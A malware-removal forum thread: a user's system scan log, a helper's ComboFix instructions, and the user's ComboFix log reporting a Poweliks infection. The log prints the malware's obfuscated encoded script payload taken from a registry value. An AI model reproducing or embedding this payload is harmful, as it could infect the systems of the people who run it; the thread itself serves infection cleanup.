Error: (01/24/2015 05:16:35 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 40. The internal error state is 252.

Error: (01/24/2015 05:14:07 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (01/24/2015 04:52:31 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The risdpcie service failed to start due to the following error:
%%193

Error: (01/24/2015 04:52:31 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Total Defense Common Scheduler Service service failed to start due to the following error:
%%2

Error: (01/24/2015 04:28:51 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (01/24/2015 04:18:23 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The risdpcie service failed to start due to the following error:
%%193

Error: (01/24/2015 04:18:23 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Total Defense Common Scheduler Service service failed to start due to the following error:
%%2

Error: (01/24/2015 04:18:21 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Browser System Enahncer service to connect.

Error: (01/24/2015 04:15:28 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {995C996E-D918-4A8C-A302-45719A6F4EA7}

Microsoft Office Sessions:
=========================

==================== Memory info ===========================

Processor: Intel® Core i5 CPU M 560 @ 2.67GHz
Percentage of memory in use: 37%
Total physical RAM: 3509.86 MB
Available physical RAM: 2206.82 MB
Total Pagefile: 7018.01 MB
Available Pagefile: 5457.46 MB
Total Virtual: 2047.88 MB
Available Virtual: 1900.29 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:297.94 GB) (Free:201.3 GB) NTFS
Drive d: (RCT3) (CDROM) (Total:0.67 GB) (Free:0 GB) CDFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 298.1 GB) (Disk ID: B3AF73EC)
Partition 1: (Active) - (Size=157 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=297.9 GB) - (Type=07 NTFS)

==================== End Of Log ============================

Link to post
Share on other sites

Hello and welcome!

I'm Radek and I'll try to help you with your issue.

Before we start please note the following:

  • Analysis and research take some time, also sometimes real life gets in the way, please be patient.
  • Limit your internet access to posting here, some infections just wait to steal typed-in passwords.
  • Don't run any scripts or tools on your own, unsupervised usage may cause more harm than good.
  • Paste the logs in your posts, attachments make my work harder and more complicated.
  • Stay with me to the end, the absence of symtoms doesn't mean that your machine is fully operational.
  • Note that we may live in totally different time zones, what may cause some delays between answers.
I can't foresee everything, so if anything unexpected happens, please stop and inform me!

There are no silly questions. Never be afraid to ask if in doubt!

warning.gif Rules and policies

We won't support any piracy.

That being told, if any evidence of illegal OS, software, cracks/keygens or any other will be revealed, any further assistance will be suspended. If you are aware that there is this kind of stuff on your machine, remove it before proceeding!

The same applies to any use of P2P software: uTorrent, BitTorrent, Vuze, Kazaa, Ares... We don't provide any help for P2P, except for their removal. All P2P software has to be uninstalled or at least fully disabled before proceeding!

Failure to follow these guidelines will result with closing your topic and withdrawning any assistance.


51a5bf3d99e8a-ComboFixlogo16.png Scan with ComboFix

This is a very powerful tool that should be used only if advised by Malware Expert.

Do not run ComboFix on your own!

Referring to this instruction, please download ComboFix by sUBs and save it to your desktop.

Temporary disable your AntiVirus and AntiSpyware protection - instructions here.

If you are a user of CD emulation software (like Daemon Tools or Alcohol) also disable it for the cleaning process - instructions here.

  • Right-click on 51a5bf3d99e8a-ComboFixlogo16.png icon and select RunAsAdmin.jpg Run as Administrator to start the tool.
  • Accept the disclaimer and agree if prompted to install Recovery Console.
  • Do not take any actions while ComboFix goes through your System - it may cause it to stall!
  • This scan may take some time!
  • When finished - it will display a logfile (located also on your main drive, usually C:\ComboFix.txt).
Include that log in your next reply.

icon_idea.gif If you'll encounter any issues with internet connection after running ComboFix, please visit this link.

icon_idea.gif If an error about operation on the key marked for deletion will appear after running the tool, please reboot your machine.

icon_idea.gif Don't forget to re-enable your previously switched-off protection software!

Link to post
Share on other sites

Thanks Radek!

 

Here is my Combofix log:

 

ComboFix 15-01-22.02 - User 01/24/2015  23:34:46.2.4 - x86
Microsoft Windows 7 Professional   6.1.7601.1.1252.1.1033.18.3510.2153 [GMT -6:00]
Running from: c:\users\User\Desktop\Malware stuff\ComboFix\ComboFix.exe
AV: AVG AntiVirus Free Edition 2015 *Disabled/Updated* {0E9420C4-06B3-7FA0-3AB1-6E49CB52ECD9}
SP: AVG AntiVirus Free Edition 2015 *Disabled/Updated* {B5F5C120-2089-702E-0001-553BB0D5A664}
SP: Spybot - Search and Destroy *Enabled/Updated* {9BC38DF1-3CCA-732D-A930-C1CA5F20A4B0}
SP: Windows Defender *Disabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
(((((((((((((((((((((((((((((((((((((((   Other Deletions   )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
.
CLSID={AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} - infected with Poweliks and removed.
You should verify if current CLSID data is correct:
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}
   <NO NAME> REG_SZ          Thumbnail Cache Class Factory for Out of Proc Server
   AppID REG_SZ          {AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\InprocServer32
   <NO NAME> REG_EXPAND_SZ   %SYSTEMROOT%\system32\thumbcache.dll
   ThreadingModel REG_SZ          Apartment
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\localserver32
   a REG_SZ          #@~^A4EAAA==n{F+2i@#@&l{xAPzmOk7+p6(L+1O`r?1.rwDRUtnVsE*i@#@&S4k^+cne'c+b@#@&`@#@&7DDz@#@&i @#@&diWE mOkKx~^9x`*@#@&id @#@&7diYMX@#@&77i @#@&i7diDnO!Dx~CcIno"nmNcrCnSH'-kG0DhCD-whbmDKdW6Y-'UnY,0Mlh+AGM3~/OEa-wU9w-w-yRTRlTF {'-kwJ*i@#@&didN@#@&d771lY14`#@#@&77dP@#@&d7d7.Y;D ~!p@#@&7id8@#@&idN@#@&7i0; mDkW P9cE*@#@&di @#@&iddXxxhPz^Ok7+or8Ln^D`EHka:^  jD\n.oHJC:PhRc!r#i@#@&i7dXRGwxcEV2KrSEB0l^dn#p@#@&d7da k+UNvbi@#@&77iE0UxmR36aC N3 \bDW :UYUY.k odcr]Yhwu--rbQEc/!4dY.r ocEcslkY(U9+66WvJ&J*Q8#I@#@&idd!0 O'!0U_rROhaJi@#@&didE6Ox0cZM+CYnP6Osbs+vEWUD~Y.;~RF*I@#@&7idb0`!0Db@#@&d7dP@#@&7idd!WYcDbOn`XRM+dwGUk+$W9z#p@#@&7idd;WDR/VKd`bp@#@&ddid!W'6R/DlOn:+6Dok^+`!WU~DD!+bi@#@&id7d!WY{0 !Ysrs`;0 O*i@#@&didd!0kxE6Y ra+U)kK+XO?DD+mhc#p@#@&d7d7;6/ ICNv bI@#@&d77iEWRq.bYnvE6/R"+m[`!0ORUk"n  #*I@#@&ddi7;0kR;VG/nc*i@#@&i7diEW ;VWdnv#I@#@&7id76RG+VYok^+cE6xObp@#@&i7dilR";U`r-rJQEWU3JwJ,&;!knO,zxG./OlMOr~TBF*i@#@&di7d6R9+^+OnwkVcE6x#p@#@&did)@#@&d7N@#@&7dSxlc2a2mxN3U7k.W hxOUYMkxT/vE]SkUNbDYE*i@#@&7d6'xA~b1Yb\n(68N+^YvE?1Dr2DkxL wks+UzkYnsr(L+1Yrbi@#@&7dbv*x6RsKsND2XrdYk`S_E-wdH/AWScr#I@#@&dd2xS_E-'E3`r+cQJ/H/SGh+cE)r/zdD+:2+J*_J'wAk NKhdwGADdtsV'--qc!-w2KhnDk4Vsc+X+Jp@#@&7dStrV`ZWcsk^n2Xk/Ddcw*#@#@&7d`@#@&d7dS-'6R!nDsksnj+./bG `A3J'-xKY2l9Rn6Jb kwVbO`rRJ*I@#@&idiE['EEp@#@&di7Ea'EEp@#@&77i/AkD^4`A7$ZT#@#@&i7dP@#@&did^Ck+PrXJ=@#@&i77db0vkcb@#@&d7di`@#@&d77idE[xrtOYalJz[Kh VWmNchk1DG/K0O 1W:J[WSxVKC[zOzRzz10+FTcZO1 8{ c*C* 4[m2RON8848m*6G+zg+OsX TjhF{Xcc+6EI@#@&did7d;2{J4YD2)Jz[GSxVGC9Rhk1.K/G6YcmWsz9Gh VGl9z$&Gz,J$fOAA8ooO+vZ,Rc$qZO1&2*O+fT/l%!zb{zqr NGS/U+D7+M+!Z&R|~,0O&! avWO2g! +X+ri@#@&77idN@#@&7didnsk+@#@&7id7 @#@&id7id!N'rtDOw=z&NKhUsKlNchk1DWkGWYcmK:&NGA VGl9&!J%&^J!%^qO0Cc *1cW c604 ,9m FX!O!XF%mOnzg+Ywa+!Un8{a% 6nJp@#@&id77iEwxE4YOw=&JNGSx^Wl9RsrmMWdW6Y ^K:z9Gh VWm[&2JZJ2&2/3O,X%2R Z!fRW**9R~v0F Rf$+FZAcWbW&bx[WS/pK |AO%O&! a0v 2gM +anri@#@&i7di8@#@&idd78M+C3p@#@&@#@&idimlk+,Evr)@#@&id77khkD^tvh\]qD#@#@&id7d`@#@&d7di7mm/n~r!Jl@#@&d7di7b0cbvW#@#@&di7di @#@&id77idEaxJ4YYal&z9WSxsWC[c:rmMG/K0O 1W:&[KhUVKC9zfJZJ%z2ZR/slF3O8f19 cfz)Ozb2zRXZW%GF/fTXlZ&bUNKhdc!OF$Ov0,2T 6WRs/Eri@#@&did7d)@#@&7iddinVk+@#@&77didP@#@&d77id7EaxJ4YO2=zz[GSxsWm[c:r1DK/W6Yc^Wsz[WSxsGmNzz&GJ*zz{XA;!8GRvf/AO*GGORs)* bs$X; qAz/lc&qk NWS/+ ! |$,+%1fZO6RRs/ErI@#@&idid78@#@&id7di8DlVI@#@&d77i8@#@&i7id8M+m3i@#@&i7d)@#@&didrWvmN c#{'!*@#@&didP@#@&d77iNcE9bi@#@&77i8@#@&7id[`!2*i@#@&di8@#@&diclc2U\bDGUs+xDcJhDW1nd/r#*`ElEb{Jr+X~`]KnaDR2U^KNrxTD=))UZ&qRV+DjYMkUov$/G \+MOT=)sMGhAm/v*?O.bxL`E[Cx*9}aGf}Gx}U.!e2I2( Wo}ypg/o^G9pK9/#~tmsoY&Zt(i!sH5qFsN!#H|oA7^ ^!C OEnP)kK s!tVsT(&x*nUI`^xjVF.Zo q"*mV#4o.!TBoA4mssO}p]^mUHk F~t^hwY}p]^mrt582129M^\4N!XF.Zo F"*^!jNq;]?\(I8^h*`+oAsn#Oq4+V0p?0G9}K9Zj]`+pA^} .2(M"VmNF(}(~h]MOYe ^E(:Gv5&.H^h.!NAI-4 oa4r*At\w8hj2+ X44 VN}o1"\8k4_3KF2lV[X8nehaV52}o`&V.[!.DS^9s}ha^5fIa8 WE}pgy} qb4uV}eqFsnZx?}q}ktg!t"2t XV}yo!\?qaFj6(j2V"N!#DSs9^t:XVef"w4+*!I Fa[;*$1&gV4q9knjxFCX3tpxA5yHV1&196%wUNqc2SV]^}hV!tj"*8hwYl Hg4+I88VjG&3^EKq.D8&x*PO3[ XVqbA3\:sk^+jaS0Is}hs!}#Il^M`W(U5kS/BG4!s.^H6}9x/lqHki jt8Mj3J3wEmysf(Ms.^z6~NoI-p+a4mfHbJsDKnpg!} T!Kp.k[VV%I(g!IV.kt9t[MjNFPk1ZTV9xsIl^!.;NqVd}!#HSVI^t:^Etig\4UHZmU.N[V,znZx?.w1StgweXre 8VSA4w\M.;n#1a}H6}N Bkl HbJsDKnpg!} T!jh.s8V.%9M^\4b*GeX/Clx}+OENs#E9MV78U19rNwPN!o!}!sHtZS3i!wX5 q^N!.H^H3;` j!?qFS8MjYtl!ep"w4yXM(Ms ^zobj .;N!sD}j6geltt+j3qrVFf}Wx/UIi(~Vp .a8M"V^kl2t \w4s#1\(IK8+pKq0V;Nh1M}jqk(V~FehXw5za&l I^} VPm1/Ks.2i X\[ZXCpx!Nqo/&kh0ih.ZNo9;.usS}jh0iMwXe 8VN!#Hmz3!iy.TU8h4V.Dtl!e("w8+lM4Vox1XobiU.!NVVO}jag5 *4t j3(r0Gf}GxZp9^[_.z(kz3._VStjxFCX3tp&Ep2BVI(I^#uVS}Uo2rATnZp!g/o^:[ lLN!s74rA e5!F;(k1ZT3xiMwXeZoFoDp5oBt(.ZtpqKjV,"lp]a4+cO\ZX1e l35p]7mU3OBwIz9`w(UA(i&"XClxpjz3Kq1396^JoY55o944 #Z}pqKiMOyCp"w4+*OHj6geq*VI("\m 3OBs"X[`wpj~4j2]Xm* pjb0j_9-5+#0Np9^FKk1/L099oHlmfI^8`s"1 jY5s6lK.DA^C~28+8tlqXN}LwG[p9H}q*TI!1D5 V!J39V[3wym+#D5h6atoHGn(X(lV.Ht?8ne:aVef"G9w0E" 67ehskpo1"} qb4uVGegWtjzYp X0q/I6J06-I w!lq,!JVgh8M^!F/xmqbs4dKs9JV.XNqsdmzLbjfV.[MjYJh"/4/(a0P/g/T3BxsjEmysstjlt[M^ ti8VNV4\\CHOBo1lm2Is4io.m+.De:X*JV9VNo]lm!jK(0F2I&x\my,s[Zl(CWy\rl.4 Ht\:.}epIaNs.H}p]K4+I.(k0G9}K9ZpB^Nu.H8bbVjly5q}^P:w!C(\VP j!lV131X*_tpIg}oIG4+}KqVN^[s~X8+gA}!]H}p1.(b3;Ul 4yY^FZ"E[X/J3zW8H*1&I^8j*UNq*Tl q^SVV![MjX8f~K}pByl 1^^H*(Il34V.Ut\NF2lV[z8n5s2VI&pTifV.NV.OSsB84UIa8`Ej l!}pB7mo1^^ }2I jyS0t48:"/t.xVtrTWKs#&dj,bCh.NN;AB4U]5NuqaJZ".8Ugt}h#}5pIa[s.H\("W4yI.J39V[28V[!4\};Lk" .ZP ,0Nq6s?!o!}!6^(k0Ej l 4+O^|/I![q6dd2zW9AF7tCj/t?0wFj0/9w$X( 1^tu.H}U32rATnZp!g/o^4}U^!}#O9(jb0^GF85 OENs.H[sZv63\X8+8Z5oHVgLI:[u9a4smGqst\NU1 F&4\e 8! oD.hFa#jNtj!9h+jw782\Y8M46eh8t?^BlsV48#}Dlj.p}#[_mu1m8 XM8T\WmiTH5iwUe`wtIa|4qVj# D(] OF hO/I $/mCsm]+snjssG oD+!Fa#.96#T9t?sB4+!Fa#jNqq3DsNZs~}jwc\s4A#h8/+q]1\2}Wjo}K50.(?oBNlu1b]y^;n!D5KioxN3sA]0,39!wc.2oS swj]y^W V83INosCA\8V6&jsIGl!H!439WCF4L}i83IUHw}!60]0I(`:x?+qqHP3xc\s1! V9?+j2(I3tUeUt+5.tCIUt pT6l]:jH}q9tI!#:NqV0i8N\IF"fK^}mt&K\n(\*Csx?|ys/`.}D]3wj}^w5HU[ZrPs;C j2Jf9c+Pt7j/,Ajw2q:y4WHow7[s\fj("fi3^!I`#qmjImthN~p:tJK!#GpT6N}x^H#TgKKoo;}TpWt8A45?O6?sI^Cja5t(^|ihjKI [An!. tTs~p`,"K!VXI#3y6M8H !j*K!]^li6UtsV\"2^Lj_I2i3"wnVgCt"x5rAoA`2Ya#PHSl^.eji37?pAUtVgHih\*Ko4sjipHjoAo5:"A1^9;\Fw3iW\ih\*IVt:9!*N[#NA}s}fKh]"KTw0tjg|#!\KKs]bppw2}y66}j^!KNVx^MgZe3w2ni"h5Z]k5Ls;CT1A|Z2X+PeZj9IA\Fj2C#45Nz0S9Ia\woT:y~5ly17#!l?e!xI#pI*.N499fsGjp.^j`9opiox?3N;}3jA}i9hp o~ppN~}`s3t&I*+^._8!A\6jg|ih\wI [An!.VtT.~p`VTKotxKhhl}jgHFq~nlT}2}36Vj:s#"FgA+ Vo K9K[FavPP"!?ZH91&Vh69jHpq,+K+4N49AV (5*}T^!+i]x?3t;}0.$5jwpHy3.8!jAJ av^3ADH8H&Ik,Uts1ANyVU1#]sjUV+ ("&i3wpN+VZ1Vs~}`s$\yg&p0I~}L~K KAc}#w*KA]&`2Vjt%Vq1AVdI%#x3s0}&jH u9IIo4slU9&8213mMgZ1`9"Fyg&P&gqCPzy1V2.`jV~83p7}V.iSqtspTw~Hs~2}V^11To&!Ia\woT\y4L.qN+62w3exjHCUwIp`oA5!w`ti1tl s$pio~pThH}&"VPVwp? ^H9A~P2HzmKw5}Z,q f~LnV9r#U\;jNtE`V$ !Yxlj}eNT}25qtm8F4Kt3w*p%]yroA~}`s3t2w1j0sU^j"c[!S\#!\ZH:#A"L2l}#Ahl:1oI 4s%s2HC"9i3^!KiHGlus~]y,/dyg.?`2WCkRht(gfPP4Z}^4/93w2C3s~.^V+m+^M+!,48("}e 84 sj.qVo]2AXq:O/IsFkCCwk8w|isacqoYj:Fa##N^.ZNAmq2743}7]:46PPxt?sB4?sV4C0wOm.j(l8N_8&jl8 XM^!XWmj2CIjwUe t\5qF*4 sj.fso] w|ihwc4 sj.f.mjZ.f5jwApooS 2w8X*t383I 4qj:tb]it&js1Gm+B_r wWCF41}i^!pi]VKTI2}otpf~5jjI_64lP"M\ijcmwsE:2tUt!tK5y*dpU4M!1~P"M^Tj34!]VI3tUe^9XILxrp oS#y"l]Fx* s9k?wBkCwN6owVNsN9KusV}i6G# w2t#g& ]:.T6N#A16jVax+b,l[x^;iV&DC XI.sq2UV.s hWHN2pXHiBM}ip7[&4*HhOpST]&jP.h6Voa:O!.01x[2gpj("s]i4wIw2:\!s~63yt}`19k!h;+i6o}fghiixxi94 j!s~j2sf\Mjw?^t^nja?t.gM[TADIq[x5js~Pf1tl:soPeW4i6It(^Ht!jwKoBsli6Ajq1}9C9?IVV+i!9x\VTc}iwp?ys.tyA$##t"pU,BmoBsjT6Utx^H !\II9Bxm3.;tA2+`3&yjqI"8kO?tx^2th\&KsHFj!IstUN}}wsK?h]^pTw`tVgr#!xA+U[G43cljoI6}j^h5Z9b}j"*]C~L]!xZH`BD5!pM}PVl1NI}13}..iIa s4&J"~51!VS9Ih\wt.I O(K^9N}Vw.[L^63^!H`H99."}V.~p`V(ITB;Iis~]&~AeiwANTo~pip.[NVjj9\pU%l}!a?t:^M[TADI`tI"js~jpIt.0V649s~pThMi2OD]993K3txH#._iZs.9}1812 xa1HC"S}T^y+`0cgK9~8f}hlV1dH3t\N9VGj("*]3^q?3B;Iis~}jb"mKg\I`27Cxah}?kyif9kS8B:`!I2C m8.V}j+p2\NuN5}.~&CP5 pio~pis \2N/"2wZHw1\\gAi(^H}f9p?j#:}.5Zj 6V1`Vep ]GNi6^[Fw2th\;mV47mTtKeZqq5VADH2Nh^!4w\ft!CsjI?`o/"Z,0t#p7.s}9?V(Zj3t;jjZ\}i45}!VS9I 6AF#\&aypqIb[jX;^.wA}iwf?^]V5!6$^is~p`s9K/OGN/Y}}.~9t"x5H3ohm"9a\jtU:F\5HV1+#!l[:a?HhlIlq2m!Va#st2IGN%.o27o10}(^ZHuIcj3o~pipS}`Fj5."6I_N2PZOjt3&6HiwMH:sA`2,a\T.wlV}CHp^7rPsGj("9i3^!KiHGlus~#0s3.z\jN}2j(a&]L^V#"4EpZ#A5V}$#fNMl0V(m"4~pis~]3l(#%xhms[_m!6m8y6!m3\Wmq1Deja? Kj}e ZF4qs.jFso]fAks,dIhOklusb] w|isa? o$KhFa#jNpj!9\+jw782\Y]:46P!8t?^Bl1sV48#9Dlj.p5q[Aj!9m8 XM8h8hmq[_5iwUe`9Om.j(ljw782\5PM1\[!9ApoLhj3.`]"VK0FVIsHw+uA\83Xqisjcl!H!43}m^yI!jj4WpsVV\.gc\s`hi%xHw#1\2}hj3wy:A(?oB`+!Ymj2a/ Ug3Iso&KUwa]Ns9f~.j2H6jak^ "Mj39/HVo(U2tUiT9.5jtA4!sVH!YW\s4.iP&*I!H.}35H]8}G\295?w90n2ak83Whn9~5}8s(gwm  t01`FVIVOw.%I4 s"qisgc. o&?h6m^yI!:j9MlyVV\C^c\s4\#Pg/+^oL\252]ft.5N9}?oBspsI0j2ah Ug3I%s_1 *a]NHzf~.qqHnMX16M"M#T"9Nj2C3tUthty50N luLS9t0 swvPpg3IVoG1 Yb]2VBqswj?w9"CCjl sx&n9~.KqBq\CA^^+IVI`Hql+B_+iVIiV"qihwx}i]AmPAm8y6!1383I 9S]39!8Xk!C/kcp`oCIjwUeUtM48I$pio~I3tUe3XrtT4hIs2.}3}Z[V,/f~(1wWW\yTc6M"M[h4??s^&"2tUeT6mp2}i}o2.}3}WtFt&CP~AK ^WpiFaJZ1\::8tIV}a[F^3iXDHthafK^]}jwI 3sH|8VTKhH~j3w$iVAFC XI.h2A?s.A oWz9&5*H`1s6j\LjjW*eTwc+:]\:LVN}poSjwI+N+]NjT60e.gHiha*KoBAp%I~6Vs\\jgKKw1G}!X.}x^HiixxI;1x`2,~6 sn}s1f+r0Z43*ajXC3^/r ox43}\]_}3"f"tI0s~}jA [y\Ht!4w?s]tjC928fIqlAVTKhsxN3}+}?ky}V4wK3]t4i65j`V3:O/Ks9x\j\?}.zDjqjmyst(Na\o}2l:s mT3lpTYU}.\sP+DI.sB&.iW7\w}f\yt6NZp.PMXx\yw&]9g.IVs5tYa#Ps.l^jAH3TWppA`#&^H#o9*?qt~.PA~6Vm+j3AhHVI" 3wxJ 9pefjFI;OA}Ks~H!hlHAVTr ow}iws# 1&ts9Z+ 4qKsI$#j.Bj.z*.^wx[Vww\20cCP"&jq[A5js~jp.wI`V]pio~piIl8 Xei"pj+oKjh5lJy1}Dw?^9o}K9&[XDCCiwAp`o9tj9Aj 6V50VTIhBxmTsgJy42is9w?qtAH#.hCw2T\swl?Vm762DL[392Jf9hHA]9:3}b}s9_K.1 }+HZlU9o]&IX]V^!.iqUpT6;]A.3jV9xIw9oCja5#&^H}TOy+qVyj:,a#%s2l^.f+3o7N9sN}?kDt3"5.i}2P.hJypa5&I*Is1w]!": 2w?efjVIVt55.90}j%7j^NXKo]o+i6Aj1&nPg5?"t24i6U#2V\53^S?^9o}!l?i:4I#PwnK^B`V27\#}M.jbX.%$xNUN$#.4\#i\r.!2j9IjiGV q3\2S8}0}!a?#FgrisgWjU0yj /7\#t".:IdIU25SqN$#.49#i06IU#VpUs;]0,6`:wWjU%X#:9n62Wcj""!I s91&Na\"2Wl^V%piq~pisjif^ V\fpU42p#s~}`9edywl8.56Kw*if^(i3" IVtA:xsd8!t"S.seK#LX1uw2]xj2no4j?U[ jisq o}"j.\M.w}ktCwI] 9APiwApotx5Vs~}i9oKU%X/0..iVW[F9xC 4&pit~pis~iGt \jjA50sx[V^n6K4pC3^Dp`oA5!*Utht".sFGN"o;mTsjJy06}T^/rj1g5T}7jq,%5jx.p`s~]ZOM sxA]f9fI [q`:Yq\ I`.:sV/0..iVW[F9xC 4&pit pis~iGt j!jA50sx[x9nJ 5his9XS8tyI!}7j ,Np`9%pio~I/,V#sxA]f9fKsBs+osq[Nt :!jA50sx 2ww\sTct3xSI;Of1fsAe+1V4ZV-5To;}Ts~}jxqHU9(lU$x4+1~]sq-"V^?p`N2]CxfJy4CTjA50oS: YaCuN~l:tV}s4kNVw2tFwA#s^ m+^MN"Aj\qs\\swWVsKCMxtCCwH["xt?^BVsVm8+6V1yF-ph2ju1jjKwCPT"pSq#x493lPqI!}2"ZIAN2]ZOM#!xZ]f9fIo[An!. [T.~p`VTIqBx4358jKwMHi\fKsBN+os4}y,o5jwfK^9"Cswc[F9DC 4&p`]A5js~j 60+0VdrP$x493HjS*\i^/rPHx493ZjqhXgVzc.^tw]xA]C\q]9"&10oI5js$##oZ.`}}S+]"lVt;e.gSj3wAKVo~pi27nw.-`jxypqtN}.~W}.wZ}iwfKA4K`3s_[T1}js}*j#eX}us_tL06FT8LIU$x4+1~}:I$5jw2S.bZ 2w2Hs4|}iwApqsvjFs"}U1~+_Npl+sKNTsA[!wA}#z\.+^7l9}AHwNa5jwApqs i:OA]2wA}#z*HU11I!}Sj ,Np`9$pio~pso7ns9}iixyp V7pPml[HYom.wAp`sx\jI\]35\t!\v?ABt5!Y&}isUp`s$p#tD4qW7\FT!J"^nIU[&jV%7ns9(5:wf?Zt~}.gA}jwAJf4.pjoZ1!satTpM+`2.HU[VI/,}[L4P3jA5VoxIPI~}Zs$5j41lH%.#j^c[F9xC 4&p`#&5js~P+w41H%-Sz0..iV7H:^Sj3w24fe7Hz%7HV6!}jOyK;,W#FwI}xgA8"\K?Z4A5:,~jis~p`}V.z1W.q."}xgAHU1\S"o8mTm7nwN]`jxypq%yi!Dq}j5\t!\;SZt}`3s_[TIHpH%*.hOwp 9~j!ODC 4&pj0..i37nwNo`jxyp:}2# ahjOL}i^!INsM}.o6!*GIAs9I9[;./,.}jwI}iwfIo2GjiF~PytK}sz\SyV"iDWe!wpC3Xyp0oA"2t;ei1d?As$Iio~pis$#9ZC 4Zp 4}?%2M#0* j:XVKwA0i3wC[!t*#3j150oMj(92e%I~`9"p#t7Ns376jM[TADI B Iis~]0p-\2gI.q3WPy9c}gA}i^ K.tSUM%7JzYt+`VdKi2GpT}li?Ds#owspiog5T}7jq,%5jw.p`s~}!lL}j9S]ijfI:$Eqf.d6ow"l:t(4f2hSz%7HC\}nu9(}+sKNTs;tZs$5j06?`s\8FwIj."Kt!\/.0dc"XYl]+1bp`}4?sBGj H76jM[TADIP#"pis~]01\`3gIjj2[j"fijwACPT&4ZXFmk%7Hu}7lVjAj!4glTs~}jwv\%wpSTtI+39_[Z16`3gI.j._CMD.nCgAe 9M.VoM`VI_[TI&pss9?T4~pit~}jwAJf4(p#oUmTsKeZs}mj^xp`s~}!Xce gM8T^\5ZoA\!s~}i1}jZsu?T#wpTjS8VTFj"4Mj#iZ43.n}8p-":x?p`N2}!SD]CI&t3\?48[s:9~i9tqmZ.$5VoxNUNhJ!OHj!wcpi[2p%Ah8w}-qjj150s56K~|}F"q}hwf?Z4A5jw~}is~.b%*.sowI 9~j("sjVgKK3Hxj3.wj:s#U3xWj8}D8!w\.aIJ"ws58t6: YaCuN~S.V6/0lKT6U}Fw.Cp9Wjj0XIiV4}`1$5jwZm`sV ZOM VxA]f9fKAXl`3s_[TH7p`V$pioV}us~if0hjVx;S"ok}us~iG3AU3g;S.sDt!wx}jwAe 92Sy]f`.37noNjj`9"p#LX1 IoHC"sjVwwIu4;.3Ij\jVtLwV|yYxt gA]MXLjVxZHA36Ix9;#+t7jot"p#tyro}5]jwk}i\r.oiH}TsM} N$g3aj+;%76."8&I!Jf4.rwoZ1!sa6!IsV6+pTB~pTp2}Vxj#s\l3T7smyPwb-dXR*48V&jxA]Va(#hO/I`2f5!w}ei1d?As3STtjpVs_[!t\Jf1cpioV}!,N]`Fr5j9WNZ9;[!ww#.wDjqzc.sHs"9~j#AwIA3a}VoqKzYN]FwL}i\l4"sw. 9~iGt `3jA50s_t!j?CCgA#UIc.NBs59~j#t~}w9/.!o~+3N_[!x(Jf4.rooUmTs 6wsHd&4(Kjs;^!w.] ^ICix&pjtY\FVUCu1~.NmaN+];mTsqtL4iijs5Voxj3._]wA$jj\Zm`sk}xwA# K\}#&cpjt:}s}:]isbp`VdIi2;jTpMif4pC3IcpVo~pUs~j:sHU3g?jss ]:On].^k}i\2?ABt5!Y&}isAp`s$pj1W.VF"}xgAJ"gIlTtx43.n} W-"V^?p`N2}!":}Fw}}iADI`#&"js~]V*7}AN]5ToV5Vt;ejgSj3wAIio~pi27nw}f`.xypqmWij8tL4\TjA50oM5VN4]i9_I2N/ut!pV.&}jx(Jf4p#oUmTs 6ws#jKxWN..;^!w[L4iVjA50oS":1NCu1~NN13.i[2pzY^}!wk}i^ K9LyjThMPG}BUsxypq3W[xahP ^sJqz\Sy4L5.AKj"I~p`s9Kusg5T}7jOL}iw\pio~pT*ji`wOm(aCI_N"j:8WtVK66#g ?.$I`KV~}is2K8Io+iq`jPN}n:9cP a!4#s`}fN}n0VqqK&*NA6_ (9l8.aYPitFls(XtC1m]T3.K`I.+VaDKU}bi&9cPq".Niqa1uV}]Asq:xaDmZ,`#(j1C3`6P!asN`XjI&1gnV.8KjIUH3a$IP.}}y"vPq"ypio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$p#]qm3s~}jjA}iwApTo~pi27J.t$5jXxp`s~}jwA}jwA}+9Ap`oA5js~}ish?GN-KTotjiw+i!1!}#jvKVsq}uAbC0FXUjtFIjIw[&j2iODiiwAp`oM53}~}i9gpjsBpjd.?%Aq}jwA}iwApio~pi2Z}`s9U(9yp01 